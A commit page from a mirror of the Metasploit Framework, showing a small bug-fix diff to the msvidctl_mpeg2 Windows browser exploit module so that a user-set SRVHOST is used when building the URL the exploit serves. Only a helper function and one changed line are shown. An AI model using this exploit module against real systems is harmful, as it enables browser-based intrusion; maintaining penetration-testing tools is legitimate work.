infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4148, @wchen-r7 fixed #4133

bug/bundler_fix
Jon Hart 2014-11-07 08:26:29 -08:00
parent 71a96f256b 0dbfecba36
commit 2b7d25950b
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 8 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/windows/browser/msvidctl_mpeg2.rb
View File

@ -75,6 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote
@javascript_encode_key = rand_text_alpha(rand(10) + 10) @javascript_encode_key = rand_text_alpha(rand(10) + 10)
end end
def get_srvhost
# If the SRVHOST isn't the default 0.0.0.0, obviously the user wants to
# specify, so we will not force source_address()
return datastore['SRVHOST'] if datastore['SRVHOST'] != '0.0.0.0'
Rex::Socket.source_address(cli.peerhost)
end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if (request.uri.match(/\.gif$/i)) if (request.uri.match(/\.gif$/i))
@ -187,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
j_memory = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2) j_counter = rand_text_alpha(rand(30) + 2)
host = Rex::Socket.source_address(cli.peerhost) + ":" + (datastore["SRVPORT"].to_s) host = get_srvhost + ":" + (datastore["SRVPORT"].to_s)
gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}" gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}"
if ("/" == get_resource[-1,1]) if ("/" == get_resource[-1,1])
gif_uri << get_resource[0, get_resource.length - 1] gif_uri << get_resource[0, get_resource.length - 1]